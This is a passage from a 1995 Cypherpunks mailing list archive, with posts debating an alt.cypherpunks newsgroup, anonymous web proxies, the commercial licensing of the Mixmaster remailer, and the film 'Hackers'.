alt.-.-.-.-.-9.9.9.9.9 or something like that till some admin cleaned them up, or some one put out a cancel for them. > [more on why cpunks should stay as it is] > > In some sense, the Cypherpunks list is somewhere in-between a full > newsgroup and a small working mailing list. Couldn't agree more. Keep cpunks the way it is. > Second, would the benefits of wider exposure, as "alt.cypherpunks," > more than balance out the negative effects mentioned above? Don't think it'd be worth destroying the cypherpunks list over, alt.groups are great for censorship free discussion, (alt.security.pgp and some of the other crypto groups have their good moments, and there are quite a few people who frequent the a.s.pgp group acting as pgp guru's anwsering questions systematically at the rate of half a dozen a day or so it would seem. It's gotten to the stage where a pgp newcomer can post how do you blah fingerprint blah, and there will be a whole bevy of regulars keen to help. Probably is very useful for PGP newbies.), so perhaps an alt.cypherpunks could develop this kind of a use. But some people view alt.* groups with disdain and don't look at them, so it might depend on the intended audience. Wider audience might be achieved with a comp, or other big8 group. I thought recently about writing a cpunk technology FAQ, even got started with a list of what I wanted to include. What I wanted to do was to gather together pointers to all of the available technology available, crypto libraries, disk encryptors, remailers, etc, in a form which would be a useful quick reference, to know just what was available, it can sometimes be tricky to find all of these things, as you see people asking about disk encryptors in a.s.pgp, and about remailers, etc I just got finished with the contents list, when I came across by browsing someone's cpunks page, Tatu Ylonen's 'International Cryptography Pages', so I junked my 'table of contents only' FAQ at that point because he had done it all, in comprehensive detail. I reckon perhaps WWW is a useful way to put across info, most of the FAQs which get posted to newsgroups have a WWW home, or end up being WWW only, and not posted at all, or pointer only. I'm really impressed with Tatu's pages, take a look if you haven't seen it as it's a really good cypherpunks technology resource guide, the software packages section is likely very useful reading, and would answer a lot of FAQ like questions for some people with security, and privacy questions. I reckon perhaps some of Peter's aims could be furthered by posting Tatu's pointer as a FAQ to a few of the crypto and security groups: http://www.cs.hut.fi/ssh/crypto/ > This brings up a final point, with more than 10,000 newsgroups, > including nearly a dozen devoted to crypto, PGP, security, and > anonymity, aren't there already enough? A likely effect of > "alt.cypherpunks" is this: > > From: david at sternlight.com (David Sternlight) > Newsgroups: sci.crypt,alt.security.pgp,talk.politics.crypto,alt.cypherpunks Yeah, that is a problem, all the security groups seem to get merged, much to the annoyance of people on sci.crypt, and leading to the creation of sci.crypt.research. Also the point of there being lots of newsgroups already is interesting because when you look at the crypto and privacy related groups there are already a whole load of related ones. It is just the noise ratio on most of them is rather bad. Perhaps a systematic posting of some useful FAQs and URLs would generate a useful effect in terms of increasing use and awareness of cryptographic solutions to security problems, and as privacy preserving methods. Larry Detweiler used to post the CRAM series, some of the info disseminated was useful. Perhaps a similar approach could be taken, posting cypherpunks technology FAQs to relevant groups. MPJs getting PGP FAQ has lots of PGP info, something similar or just the insistant, helpful reposting of Tatu's URL in places where people ask about such info might be useful. > But, if anyone wants it, create it. Then people can vote with their > feet. Both the list and the newsgroup can co-exist, and if the > newsgroup "wins," the list can be dropped. I for one would prefer to see it in a co-exist mode, with different objectives. I'll go away now, and let Peter continue, if he hasn't been put off by the mixed responses. Adam From carolann at censored.org Sat Sep 16 15:53:31 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sat, 16 Sep 95 15:53:31 PDT Subject: Look, a *.cypherpunk group already exists! Message-ID: <199509162253.PAA26158@usr1.primenet.com> Over here at Primenet, there is a newsgroup called mail.cyperpunks. It came in as a newgroup a couple of weeks ago. New articles posted to it make the list. I'm amazed we haven't been commercially spammed yet! But it's there already. Just in the mail hiearchy that's all. alt.cypherpunks? ohmigawd! Sheesh! Love Always, Carol Anne -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From harmon at tenet.edu Sat Sep 16 16:31:02 1995 From: harmon at tenet.edu (Dan Harmon) Date: Sat, 16 Sep 95 16:31:02 PDT Subject: Quantum computing info? In-Reply-To: <199509160259.TAA03727@goblin.punk.net> Message-ID: Check out the newest issue of Scientific American. Dan On Fri, 15 Sep 1995, Jeff Simmons wrote: > Could anyone point me to information on 'quantum' computing? > -- > Jeff Simmons jsimmons at goblin.punk.net > From dl at hplyot.obspm.fr Sat Sep 16 16:47:55 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Sat, 16 Sep 95 16:47:55 PDT Subject: Anonymous WWW proxies Message-ID: <9509162347.AA09904@hplyot.obspm.fr> -----BEGIN PGP SIGNED MESSAGE----- I'm halfway in the coding of a simple anonymous WWW proxy, but before going any furter, I'd like to know: + If this has not been done before and is available ? (and where) + If there is any interest + Chaining would be a imo good idea (ie cli <-> anonproxy1 <-> anonproxy2 <-> ... <-> server) but how would you manage to tell your favorite web browser to add in its header something like Http-Proxy-List: anonproxy2, ... An alternative would be to have a database of avaibale (running) proxies and that the proxy itself randomly choose a next route ? + A way to solve previous pb and to add in encryption (but would it be fast enough for web browsing ?) would be that each user runs a local proxy (that could be optionnaly used by other folks) that would do pgp encryption/decryption, 'routing' selection,etc... Would ppl with mail remailers and/or W3 experience comment ? (or tell me the pointer toward the already solved, already implemented beast that would do the above) - -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface iQCVAgUBMFtiGXk52/beodHxAQETVgP/avWKpD/AUiRPM0ljX0BH0e7q10KYEOdA Hu+/Bsr7PWANdfhefs/ASrJn/kiOIQwo+RGV1K3UKWu7IyYdHHrINZkp0OcFlIR5 8TIfW6/FqBaUwAzuCV0/acUhXW6ah7xpPkgiHJ04Nlu8BKh72QGawJLJDoT2JmIi o67LVdD5ajg= =/kSM -----END PGP SIGNATURE----- From wilcoxb at nagina.cs.colorado.edu Sat Sep 16 16:54:06 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Sat, 16 Sep 95 16:54:06 PDT Subject: "alt.cypherpunks" Newsgroup vs. Mailing List? In-Reply-To: <9509161930.AA08524@spirit.aud.alcatel.com> Message-ID: <199509162353.RAA06965@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Several people are working on improvements to netnews which allow more active filtering. The most promising techniques that I have heard about involve a lot of "ratings" being generated by readers and then taken into account by other readers when filtering/sorting the articles. I am perfectly happy with the social scene on the cypherpunks list as is, and I think those who want to move to a newsgroup don't know what they are asking for. (Go read sci.crypt and talk.politics.crypto for awhile. I expect an "alt.cypherpunks" would be indistinguishable from those two in short order.) BUT, I was thinking that this group (I mean, this group of people) would make an excellent group to test this new technology. Think about it: Perry Metzger could routinely give conspiracy articles/authors a "-10" rating, and those of us who agreed with him could set our "Perry coefficients" to indicate the degree to which we agree with his evaluations. Thus we might actually gain a *higher* SNR by moving to UseNet. (And it would provide an exciting example of reputations in action...) I don't know if the technology is there yet, or if it is accessible to most of our readers. One person who is working on such a scheme is "(cm)", or "na48985 at anon.penet.fi". I have added his name to the Cc: line so perhaps he would be so kind as to tell us about his "NoCeM" ("No see 'em!") software. Bryce signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---* -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta4 iQCVAwUBMFtjUvWZSllhfG25AQHSoAP/aH1kzLO+JYzlPqdAA9Zeb7JpeWbt4xEI WH0HCP+sjEFgsW/sXpEpjT5TuMe3/FyGAJFZTN0l8SLythYuFJauGs5xf2tEv8OQ 3q5jTq4pztMbvD9FnlFeU4kfcg5yJkvy9KDebfxtRAfDvIz6BTxGuNkJ18rJBXlY OCg+mm8vYmc= =paQk -----END PGP SIGNATURE----- From roy at cybrspc.mn.org Sat Sep 16 17:16:04 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Sat, 16 Sep 95 17:16:04 PDT Subject: CYPHERPUNK considered harmful In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk> Message-ID: <950916.115448.5Q5.rnr.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, aba at dcs.exeter.ac.uk writes: > One thing I have been thinking would be nice would be a USENET > newsgroup, as mailing lists are a step away from easy access which > some people never make. That's a feature, not a bug. Unless the group was moderated, I predict the S/N ratio to be <= 0. Witness the crap in alt.2600. The mailing list, as someone said before me, works as a limited pre-screening system. Given the nature of the list's focus and discussion, I think a newsgroup would end up being a stable attractor for the clue-deficit crowd. Not something I'd find useful. - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at cybrspc.mn.org -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFsCyhvikii9febJAQFJVQP/VDKh+Mb8FFsm85IqOmYOZ82gam7Lmbwp +E3sSOnnRUVQAiT8vbSs/qeA3ozZEF6Oi++CVYzPh/S8zLUufoUqSGuhOwXi2Z3R XH1CTkXBYccuQkd7wG8Sm7Q9sN+zd8iR4byWQrknlSua9czivNjHhUNDxgdwSR7p yI3GCz1L244= =uYVL -----END PGP SIGNATURE----- From steven at echonyc.com Sat Sep 16 17:40:41 1995 From: steven at echonyc.com (Steven Levy) Date: Sat, 16 Sep 95 17:40:41 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: >I saw "Hackers" yesterday. It's not bad and its political sensibility is >very cyberpunk. The ad campaign even uses the tag line, "Their only crime >is curiosity." It may not be a crime, but it's not nice to steal a title. From remailer at flame.alias.net Sat Sep 16 17:41:19 1995 From: remailer at flame.alias.net (Flame Remailer) Date: Sat, 16 Sep 95 17:41:19 PDT Subject: (noise) Re: SPAM bait In-Reply-To: <199509161913.PAA55049@tequesta.gate.net> Message-ID: <199509170041.CAA29649@utopia.hacktic.nl> > What I don't understand about inappropriate SPAMs like that one > (or telephone ads) is; what's the business incentive to do it? > I assume that no Cypherpunk has subscribed to "Janet's" magazines, > and I know that no Ray has _EVER_ spent money over a telephone > unless we initiated the call, yet *still* we get unwanted calls > every once-in-a-while. WHY? Well, that may be true, but I'd suspect that the average IQ on this list is significantly higher than the net at large. So if you spammed enough newsgroups, chances are that you'd find a sucker somewhere. Even tho it is becoming more common for marketing firms to keep databases of who buys (or doesn't buy) what, I suspect that a lot of calling is still done at random (the local newspaper still calls us even tho we have subscribed for years and told them several times that they are wasting their time calling. So I suspect it is just done at random.) These days, many telemarketers have autodialers that call ahead and then connect a salesman after you have answered the phone. So if I get a call, say hello, and hear silence and then a click of being transfered to the next available salesperson, that it is my cue to hang up. > [Please respond privately to liberty at gate.net ] uh, well at least this post is labelled 'noise' for the mailfilters... From jamesd at echeque.com Sat Sep 16 18:29:34 1995 From: jamesd at echeque.com (James A. Donald) Date: Sat, 16 Sep 95 18:29:34 PDT Subject: Mixmaster status changing Message-ID: <199509170127.SAA20213@blob.best.net> At 03:04 PM 9/14/95 -0700, Lance Cottrell wrote: >There has been an offer to purchase and commercially develop Mixmaster. >This will hasten the development of Mixmaster for other platforms (e.g. >Dos, Windows Macintosh), and bring significant improvements to the >interface, but I will not compromise on the level of security provided by >Mixmaster. Free client software will continue to be available. This is great, but of course what we urgently need is a free windows client. What is the score on this? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From nelson at crynwr.com Sat Sep 16 18:45:50 1995 From: nelson at crynwr.com (Russell Nelson) Date: Sat, 16 Sep 95 18:45:50 PDT Subject: Commercial Mixmaster In-Reply-To: <199509161921.MAA05294@infinity.c2.org> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Date: Sat, 16 Sep 1995 12:21:04 -0700 From: "syrinx at c2.org (Syrinx Anonymous Remailer)" The concern is not "commercialization", per se, but rather the use of "commercialization" as an excuse to build in "proprietary" features (Back doors?) for which no corresponding source code is involved. And the chief concern with the Clipper chip? That it was secret. In the crypto world, secret == untrustable. Who would use a remailing network that was not trustable? Who would use it when every cypherpunk says not to? Since no one has made a good case for there even being a COMMERCIAL market for Mixmaster, could there be other motives? Value is created by seeing a market that no one else sees. Obvious markets have low margins, and they're getting lower and lower as computers help implement the obvious. Without building an anonymous e-$ infrastructure first, there's no way to even charge for the use of a remailing service without sacrificing anonymity, even if people were willing to pay to have messages anonymously remailed. Maybe someone *does* see a way to create system? If *you* knew, would you tell everyone about it? Or would you implement it, and rake in the bucks? No, I'm not accusing Lance. But if he no longer has the time to support Mixmaster, then perhaps some other crypto-friendly group should take over the task and keep it an OPEN system, with source code available. In fact, even freezing Mixmaster as is would be preferable to "improvements" that people don't/can't trust. Since you have no reputation to impugn, I feel free to be rude: "Put up or shut up." If you have the resources to improve Mixmaster so that it's easy to use, do it. If not, please don't stand in the way of people who *do* have the resources. -----BEGIN PGP SIGNATURE----- Version: 2.7 Comment: Processed by Mailcrypt 3.2, an Emacs/PGP interface iQCVAwUBMFt8wKbBSWSDlCdBAQEXGgQAo7Sl+CctvGWSGsQpeYYzMit+9eBN2iP/ Sq5k3FvHATDEJaPMTEq7PQRlQrrOkKF7jg2d0wnxJ9tFG+5ymV6SeLiJE/KXuOSI dD5oR6TOVf50ppLIjyQZhhOymon3RuJqHqQVyX7qD2ph792SACuAFvrFTlZoRkgB 8jPr7TLkIyA= =NygP -----END PGP SIGNATURE----- -- -russ http://www.crynwr.com/~nelson Crynwr Software | Crynwr Software sells packet driver support | PGP ok 11 Grant St. | +1 315 268 1925 (9201 FAX) | America neither a Christian, Potsdam, NY 13676 | Jewish, Islamic, nor atheist (etc&) nation. This is good. From rjc at clark.net Sat Sep 16 19:18:16 1995 From: rjc at clark.net (Ray Cromwell) Date: Sat, 16 Sep 95 19:18:16 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: <199509170217.WAA10568@clark.net> > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime > >is curiosity." > > It may not be a crime, but it's not nice to steal a title. I think there's a high probability of someone independently inventing the title "hackers" for this movie rather than steal it. It's not very original. Besides, the content of your book has very little to do with this movie. The movie would be more appropriately titled "crackers" or "phreakers" -Ray From rshea at netcom.com Sat Sep 16 20:00:16 1995 From: rshea at netcom.com (rex) Date: Sat, 16 Sep 95 20:00:16 PDT Subject: cypherpunks as a newsgroup In-Reply-To: <14439.9509161026@exe.dcs.exeter.ac.uk> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <43f97c$64n at calum.csclub.uwaterloo.ca>, you wrote: >Dr. Dimitri Vulis wrote: >> >>Anything posted to the main cypherpunks mailing list and the spun-off mailing >>lists (steganogrpahy, remailers, nym servers, etc) could be posted to the >>newsgroup by maiking one of the mail2news gateways a subscriber. > >That was my thinking exactly. That's why I wrote just such a mail2news >gateway to a local newsgroup, csc.lists.cypherpunks (moderated, with >cypherpunks at toad.com as the moderator), as you can probably see in >the header. > >This way, trn groups all articles with the same subject together, >and correctly threads articles that have References: or In-Reply-To: >headers. Some readers may not know they can use Yarn/UQWK under DOS or OS/2 to read this list as if it were a newsgroup. Yarn has Filters which can be used to move email from various lists to pseudo-newsgroups, and the threading, References, etc, work nicely. PGP signing/encryption is a menu choice. A hook for a MIME processor is provided. Trn filters may be used to filter the real newsgroups before the mail and news is packed by into a SOUP packet by UQWK. There is a Yarn list: yarn-list at lists.colorado.edu More info: http://www.nic.com/~cannon/handson.html - -rex -----BEGIN PGP SIGNATURE----- Version: 2.6.i iQCVAgUBMFt0+W8sjl9sYg/JAQF83AP7BgfWOaiAZQc+3A2UPQ8ej8GgdqyaUbKc vqmVUldOp9WrRsP9LZUxgW8MWd0FfWFKOpttlvfPdsrmU1CPcb9G+Qh8dc05iEIW CFBTDo2z6F8qcEtS0gnG0SGEjIvSEMAxOvurTs5qfGhSgcBnbPdpmTMgElOIJCeO hqiM+jGFd1E= =U+24 -----END PGP SIGNATURE----- From tcmay at got.net Sat Sep 16 20:28:47 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 16 Sep 95 20:28:47 PDT Subject: [ASSENT NOISE] Re: C-punks, marketing for the masses Message-ID: At 8:08 PM 9/16/95, Greg Broiles wrote: >-----BEGIN PGP SIGNED MESSAGE----- > >No disrespect intended, but I think that the various "let's sanitize >the Cypherpunk message for mass acceptance" marketing/soundbite >proposals are pointless. Cypherpunks is a mailing list, not a political >party (or a platform). > >- From my perspective, the organizing meme for the list is not "strong >crypto is really important, so let's write some and lobby our lawmakers >to make sure it stays legal" but "strong crypto is here and is changing >the dynamics of force, politics, and power, so let's see what we can >do with it." Hear, hear! Greg is absolutely right. (And Dave Mandl was, too, about our mailing list not being a corporation trying to increase market share.) I applaud the efforts to lobby Congresscritters to vote in ways we would find desirable (though I note with some irony that the Congressman who has come out most strongly _against_ Net censorship is Newt Gingrich, often demonized by many. To the credit of EFF and EPIC, and others of that ilk, they noted this fact.) But as Greg points out, we are not a political party. More to the point, we have no centralized resources, no staff, no travel budgets, no ability to appoint spokespunks to speak to the media. This is a weakness, and a strength. I think it was Bill Stewart who noted that the "conventional" cyberspace lobbying groups, such as EFF, EPIC, CPSR, etc., are largely "director-driven," with a handful (or just one or two) directors making decisions, speaking publically, and getting all the attention. The Cypherpunks group is not like that. Lacking any formalized leadership, and--most importantly--lacking offices in D.C., we can't be asked to perform like the usual trained seals who produce the soundbites that fit into the stories too many reporters want. Again, a weakness and a strength. I sense in the debate here that some of us want to have more of an impact, more of a political impact. The cynic in me says these people have just not been in the game long enough to become realists (to a cynic, cynicism is realism). >(And no, I don't think it's important to spread that "meme" (a term >I use with some trepidation) around to get "market share" for it. >Ideas are not football teams nor initiative proposals.) > >I appreciate and support and have participated in various write-yer- >legislator activities. They're useful short-term. But if Tim May and >Duncan Frissell and the other list members who've dared to make predictions >about the impact of crypto on government and economics are correct, >what the government and the legislators want doesn't matter. If they're >wrong, what we want doesn't matter. I suppose it is mainly Duncan and I that make these points, with contributions also from Sandy Sandfort, Black Unicorn, Lucky Green, and others (sorry if I've left you out of the Cryto Anarchy Hall of Shame^H^H^H^H^H Fame). Please understand that I am not elitist in the sense of wishing to limit access to ideas many of us espouse. I discourage no one from calling in to radio talk shows, from writing articles, and so on. But I'm not convinced that "political action" matters very much. As Greg puts it, if we're right, politics won't matter. And if we're wrong, politics won't matter. --Tim ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Sat Sep 16 20:41:15 1995 From: tcmay at got.net (Timothy C. May) Date: Sat, 16 Sep 95 20:41:15 PDT Subject: Newbie Crypto question: MOD? Message-ID: At 8:39 PM 9/16/95, Childers James wrote: >Ok folks, I recently received "Applied Cryptography" as a gift, and just >have one question: How does the MOD function work in crypto functions? It >seems to work differently than what I've seen before, i.e.: C/C++ MOD. I >also didn't see anything in TCM's FAQ... > >If this is considered noise, I apologize in advance. I didn't put anything in my FAQ about "mod" because my FAQ was not a crypto FAQ per se, of which there are at least two. (Cf. sci.crypt for regular pointers.) And I doubt that either of these FAQs discusses the mod function, though I haven't checked. In any case, Schneier devotes several pages to mod, starting with "You all learned modular arithmetic in school; it was called "clock arithmetic"" (p. 198). After defining it, Schneier goes on to discuss its use in modern cryptography. If this isn't enough of an explanation, I don't know what more to say. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From adam at bwh.harvard.edu Sat Sep 16 20:49:58 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sat, 16 Sep 95 20:49:58 PDT Subject: Commercial Mixmaster In-Reply-To: Message-ID: <199509170348.XAA06314@bwh.harvard.edu> Its worth noting that the source code to Julf's Penet remailer is not public (AFAIK). People use it becuase they trust Julf, or trust people who trust Julf. There is clearly a market for anonymizing services in various forms. Hopefully, whoever is putting up cash is also looking at building a web proxy service, a pseudononymous system, and a mail drop/data haven type of operation (although the last might not fit in as well.) If you don't see a market, I suggest you drop a line offering services to the friendly folks at presiednt at whitehouse.gov. I'm sure they'd prefer a bit of privacy. Why pay for remailers when there are free ones? Speed and lawyers pop right up as damn good answers. Putting up a couple of p120s on a T1 in the Carribean isn't cheap, nor is making sure you have a good lawyer who'll protect the machines when the bad guys show up with warrants. I'd be much happier to use a fast system on good legal ground than a freebie. Adam Russ Nelson wrote: | The concern is not "commercialization", per se, but rather the use | of "commercialization" as an excuse to build in "proprietary" | features (Back doors?) for which no corresponding source code is | involved. | | And the chief concern with the Clipper chip? That it was secret. In | the crypto world, secret == untrustable. Who would use a remailing | network that was not trustable? Who would use it when every | cypherpunk says not to? | | Since no one has made a good case for there even being a COMMERCIAL | market for Mixmaster, could there be other motives? | | Value is created by seeing a market that no one else sees. Obvious | markets have low margins, and they're getting lower and lower as | computers help implement the obvious. -- "It is seldom that liberty of any kind is lost all at once." -Hume From hallam at w3.org Sat Sep 16 21:30:30 1995 From: hallam at w3.org (hallam at w3.org) Date: Sat, 16 Sep 95 21:30:30 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: <9509170429.AA05221@zorch.w3.org> >I saw "Hackers" yesterday. It's not bad and its political sensibility is >very cyberpunk. The ad campaign even uses the tag line, "Their only crime >is curiosity." I know companies who have spent millions cleaning up after a hacker breakin. I've been up at two in the morning trying to stop a person with known mental problems breaking into a site with some very dangerous computer controlled machinery. I've dealt with people trying to get rich quick by defrauding others. I've met some real evil bastards who simply want to ruin as many other peoples lives as they possibly can, including people that thought they were their friends. To me teenagers who break into computer systems are not funny at all, its like joyriding, its funny until someone gets hurt. I know people who have got hurt real bad. I like having privacy, part of the cost of that privacy is respecting the privacy of others. Phill From cwe at Csli.Stanford.EDU Sat Sep 16 22:18:02 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Sat, 16 Sep 95 22:18:02 PDT Subject: Anonymous WWW proxies In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr> Message-ID: <199509170517.WAA16625@Csli.Stanford.EDU> | + Chaining would be a imo good idea (ie cli <-> anonproxy1 <-> | anonproxy2 <-> ... <-> server) but how would you manage to tell | your favorite web browser to add in its header something like | Http-Proxy-List: anonproxy2, ... | An alternative would be to have a database of avaibale (running) | proxies and that the proxy itself randomly choose a next route ? Doesn't most of the browsers support a "firewall-proxy-mode", where all queries are sent of to a special daemon, that forwards the query on. This would probably be the place to add the header-munging. How do you plan to get the reverse-path working? Having a encrypted/chained return path in the request? | + A way to solve previous pb and to add in encryption (but would it | be fast enough for web browsing ?) would be that each user runs a | local proxy (that could be optionnaly used by other folks) that | would do pgp encryption/decryption, 'routing' selection,etc... | | Would ppl with mail remailers and/or W3 experience comment ? | (or tell me the pointer toward the already solved, already implemented | beast that would do the above) Encryption speed isn't all that an issue always. I'm planning to do an Mbone encryption gateway, (RSN). I will precompute a cryptographic mask during idle cycles, that can be XORed together with the clear-text packet when it arrives. I expect it to reduce the latency quite a lot. (This might not work, since it assumes the key distr problem is already solved in good time before the packet arrives, to be able to amass "precomputational power".) /Christian From greg at ideath.goldenbear.com Sat Sep 16 22:22:19 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sat, 16 Sep 95 22:22:19 PDT Subject: Commercial Mixmaster Message-ID: <199509170513.AA06296@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Adam Shostack writes: > Its worth noting that the source code to Julf's Penet remailer > is not public (AFAIK). People use it becuase they trust Julf, or > trust people who trust Julf. People don't use Julf's source code. People use the services provided by Julf's remailer, which runs Julf's source. Trusting anon.penet is relatively simple (conceptually) because the author, distributor, and user of the remailer code (where user = remailer operatror) are all the same person. I would be less likely to trust Julf if I thought he was running software he received (through unknown distribution channels, from an unknown author) as an executable without source. I trust Julf because (a) he seems to be a decent/trustworthy person, and (b) because I think he has enough information available to him to be sure that his system doesn't have intentional back doors nor glaring unintentional ones. If only one of (a) and (b) were true, I'd trust anon.penet.fi a lot less. I've seen messages from people who refuse to use ViaCrypt PGP because they can't see the source. I own a copy because I don't want to worry about licensing when I use it in a commercial context and because I don't think Phil would have been associated with it if the binaries distributed weren't free of known weaknesses different from those document with the freeware PGP or otherwise discloses. My inclination is to feel the same way about distributions of Mixmaster. If Lance is willing to sign the code which is shipped, my hunch is that there's nothing tricky going on. If Lance disappears, and the purchaser turns out to be unknown, I dunno if I'd run it before someone trusted had disassembled it (or someone liberated the source code) and it was inspected and found to be clean. [I think it's useful to continue beating the almost-dead horse of the marketing of Mixmaster because I suspect that the anonymous purchaser of Mixmaster subscribes to the list, and is thereby aware of what potential remailer operators and remailer users are going to like, and not like.] > Why pay for remailers when there are free ones? Speed and > lawyers pop right up as damn good answers. Putting up a couple of > p120s on a T1 in the Carribean isn't cheap, nor is making sure you > have a good lawyer who'll protect the machines when the bad guys show > up with warrants. I'd be much happier to use a fast system on good > legal ground than a freebie. It's safer still to use a system which doesn't keep logs and has otherwise taken steps to minimize inadvertent data leakage. (Imagine me mentioning here all of the by now tiresome ideas about thermite, degaussers, low-level-formats of the HD, etc, etc. Please, please, let's not start that thread again for at least 6 months.) I'm not sure that there are any special lawyer tricks to stop the execution of a search/seizure warrant. An attorney may help you keep items found out of court later. I suppose it'd be possible, if the cops were cooperative and the attorney immediately available and the magistrage/judge who signed the warrant was immediately available to try to stop the execution of the warrant, but that seems pretty far-fetched. I've been reading a lot of search & seizure cases lately for work and haven't seen anything like this mentioned, ever. If anyone's got a cite for "how to stop a warrant search & seizure in progress", please pass it along. I'm sure my boss (and his clients) would be interested. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFuuJn3YhjZY3fMNAQGsRAP+PIm6ZsjfCFetFr0//LPUuBg+tiK9b8Dh 4WXji1ab6kCfB+SCbNhU7IDNCR7pK7c1rWjVL+r0gbded46Um6+mn5hDKagKhztD nqld1vTETJFX9TmsRe3mXBE/TW1pqysoiS3PnM4mZ8b0GjErOdSbNpxOizvBOdhi jLoNKnEGnpA= =3dgI -----END PGP SIGNATURE----- From aleph1 at dfw.net Sat Sep 16 22:39:10 1995 From: aleph1 at dfw.net (Aleph One) Date: Sat, 16 Sep 95 22:39:10 PDT Subject: Anonymous WWW proxies In-Reply-To: <9509162347.AA09904@hplyot.obspm.fr> Message-ID: Whats the problem of using CERN in proxy mode? You can even set it up do to chaining. Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 On Sun, 17 Sep 1995, Laurent Demailly wrote: > + If this has not been done before and is available ? (and where) From loki at obscura.com Sun Sep 17 00:55:18 1995 From: loki at obscura.com (Lance Cottrell) Date: Sun, 17 Sep 95 00:55:18 PDT Subject: Mixmaster Licensing Offer Explained Message-ID: <199509170754.AAA23527@obscura.com> -----BEGIN PGP SIGNED MESSAGE----- From: Lance Cottrell Date: 17 September 1995 Subject: Mixmaster Licensing Offer Explained Permission is granted to distribute this document in any media for any purpose as long as the entire document is distributed with the attached digital signature intact, or the document is clearly marked as having been modified with the locations of deleted text indicated. Several rumors have surfaced following my announcement of Mixmaster's changing status. I want to nip these worries in the bud. After discussion with the party interested in commercially licensing Mixmaster we have decided to explain the whole situation publicly. The company offering to license Mixmaster is Phoenix DataNet, a Houston area ISP. John Perry, a person well known to this list and the remailer community in general, is a Senior Systems Administrator at Phoenix. On Thursday I received a call from John. Some others at Phoenix had just noticed a Mixmaster remailer he had been running on one of their machines. Phoenix has several large corporate customers who need secure transactions for some special applications. The core engine of Mixmaster is well suited to that purpose. They offered to license the code from me to use as the framework on which to build these other programs. In the process they will rewrite many basic functions in Mixmaster that need major overhaul (e.g., key management). We will incorporate those improvements back into Mixmaster. This should lead to porting Mixmaster to several other platforms, and to fixing most of my worst coding atrocities. I had never considered licensing Mixmaster, but I know John Perry both personally and by reputation. He has thoroughly assuaged my fears that Phoenix would try to weaken or restrict Mixmaster in any way. John will be leading this project on the Phoenix end. He asked that I delay the release of the next version of Mixmaster pending clarification of every one's intentions. Now that we have reached an understanding the planned release of Mixmaster version 2.0.2 will take place as soon as I can get it ready. There are no plans to sell Mixmaster clients or servers. They will continue to be released free with source code. I will still control the contents of all releases of Mixmaster. All future versions of Mixmaster will be backward compatible. There will be no "Legal Kludges" preventing old clients from working with new remailers, and new clients will be able to generate old message formats. Currently there are no plans to change the message format at all. -Lance Cottrell -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMFvVivPzr81BVjMVAQHzhgf/f9zM91/N0S/JljicjDpoGzQ6Pt4gZVy9 ar407vp6js7EJ7Kg2XHtni6FwowM066rbGrt8W/8ZoQJGBxgKkfSvhLpEL7E926M tn5QDEysVa1itzkvym2rQuNRIALfLOwzcYyLMdfjBtPMhRJkfwDthrrl9ocHkrSR WW1wPwBRj/t+LFl6ueXwN8ZYLJVmbIoLy7BcqbNzLWjqmB7jgN2toxVCRfM7qfkE 